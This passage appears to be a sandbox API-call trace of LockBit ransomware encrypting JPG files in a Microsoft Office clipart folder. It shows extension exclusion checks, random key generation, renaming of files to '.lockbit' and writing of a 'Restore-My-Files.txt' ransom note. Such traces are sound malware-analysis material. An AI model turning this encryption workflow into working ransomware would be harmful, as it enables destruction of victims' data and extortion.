(lpString1=".dbs", lpString2=".JPG") returned -1 [0159.176] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.176] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.176] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.177] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.177] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.177] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.177] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.177] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.177] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.177] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.177] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.177] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.177] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.177] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.177] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.177] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.177] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341634.JPG.lockbit") returned 72 [0159.177] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341634.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341634.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0159.178] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.178] malloc (_Size=0x40068) returned 0x1ff1e60 [0159.178] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7803) returned 1 [0159.178] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.179] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0159.179] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.179] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.180] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0159.180] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0159.187] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341634.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341634.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.187] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.187] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.188] free (_Block=0x1fa2ed8) [0159.188] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341634.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.188] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.189] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.189] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66188a70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3615, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0341636.JPG", cAlternateFileName="")) returned 1 [0159.189] lstrcmpiW (lpString1=".", lpString2="J0341636.JPG") returned -1 [0159.189] lstrcmpiW (lpString1="..", lpString2="J0341636.JPG") returned -1 [0159.189] PathFindExtensionW (pszPath="J0341636.JPG") returned=".JPG" [0159.189] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.189] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.189] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.189] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.189] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.189] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.189] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.189] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.189] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.189] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.189] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.189] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.189] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.189] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.189] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.189] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.189] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.190] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.190] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.190] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.190] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.190] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.190] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.190] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.190] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.190] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.190] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.190] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.190] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.190] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.190] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.190] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.190] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.190] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.190] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.190] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.190] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.190] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.190] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.190] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.190] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.190] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.190] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.191] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.191] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.191] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.191] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.191] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0341636.JPG") returned 1 [0159.191] lstrcmpiW (lpString1="ntldr", lpString2="J0341636.JPG") returned 1 [0159.191] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0341636.JPG") returned 1 [0159.191] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0341636.JPG") returned -1 [0159.191] lstrcmpiW (lpString1="autorun.inf", lpString2="J0341636.JPG") returned -1 [0159.191] lstrcmpiW (lpString1="thumbs.db", lpString2="J0341636.JPG") returned 1 [0159.191] lstrcmpiW (lpString1="iconcache.db", lpString2="J0341636.JPG") returned -1 [0159.191] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.191] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341636.JPG") returned=".JPG" [0159.191] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.191] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.191] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.191] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.191] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.191] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.191] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.191] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.191] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.191] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.191] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.191] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.192] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.192] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.192] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.192] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.192] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.192] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.192] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.192] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.192] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.192] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.192] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.192] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.192] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.192] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.192] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.192] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.192] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341636.JPG.lockbit") returned 72 [0159.192] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341636.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341636.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0159.198] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.198] malloc (_Size=0x40068) returned 0x3d70450 [0159.198] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=13845) returned 1 [0159.198] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.199] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0159.199] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.199] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0159.199] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0159.202] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341636.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341636.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.202] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.202] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.204] free (_Block=0x1fa2ed8) [0159.204] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341636.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.204] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.204] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.204] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56772310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2026, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0341645.JPG", cAlternateFileName="")) returned 1 [0159.204] lstrcmpiW (lpString1=".", lpString2="J0341645.JPG") returned -1 [0159.204] lstrcmpiW (lpString1="..", lpString2="J0341645.JPG") returned -1 [0159.204] PathFindExtensionW (pszPath="J0341645.JPG") returned=".JPG" [0159.204] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.204] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.204] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.204] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.204] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.204] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.205] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.205] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.205] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.205] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.205] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.205] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.205] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.205] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.205] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.205] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.205] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.205] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.205] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.205] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.205] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.205] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.205] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.205] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.205] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.205] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.205] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.205] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.206] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.206] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.206] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.206] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.206] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.206] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.206] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.206] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.206] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.206] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.206] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.206] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.206] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.206] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.206] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.206] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.206] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.206] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.206] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.206] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0341645.JPG") returned 1 [0159.206] lstrcmpiW (lpString1="ntldr", lpString2="J0341645.JPG") returned 1 [0159.207] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0341645.JPG") returned 1 [0159.207] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0341645.JPG") returned -1 [0159.207] lstrcmpiW (lpString1="autorun.inf", lpString2="J0341645.JPG") returned -1 [0159.207] lstrcmpiW (lpString1="thumbs.db", lpString2="J0341645.JPG") returned 1 [0159.207] lstrcmpiW (lpString1="iconcache.db", lpString2="J0341645.JPG") returned -1 [0159.207] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.207] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341645.JPG") returned=".JPG" [0159.207] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.207] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.207] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.207] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.207] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.207] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.207] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.207] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.207] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.207] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.207] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.207] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.207] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.207] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.208] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.208] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.208] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.208] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.208] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.208] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.208] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.208] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.208] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.208] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.208] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.208] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.208] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.208] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.208] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341645.JPG.lockbit") returned 72 [0159.208] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341645.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341645.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0159.213] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.214] malloc (_Size=0x40068) returned 0x3f70048 [0159.214] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=8230) returned 1 [0159.214] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.214] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0159.214] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.215] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0159.215] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0159.221] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341645.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341645.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.221] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.221] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.222] free (_Block=0x1fa2ed8) [0159.222] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341645.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.222] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.222] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.222] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66188a70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3df7, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0341653.JPG", cAlternateFileName="")) returned 1 [0159.222] lstrcmpiW (lpString1=".", lpString2="J0341653.JPG") returned -1 [0159.223] lstrcmpiW (lpString1="..", lpString2="J0341653.JPG") returned -1 [0159.223] PathFindExtensionW (pszPath="J0341653.JPG") returned=".JPG" [0159.223] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.223] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.223] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.223] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.223] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.223] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.223] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.223] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.223] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.223] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.223] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.223] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.223] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.223] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.223] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.223] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.223] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.223] lstrcmpiW 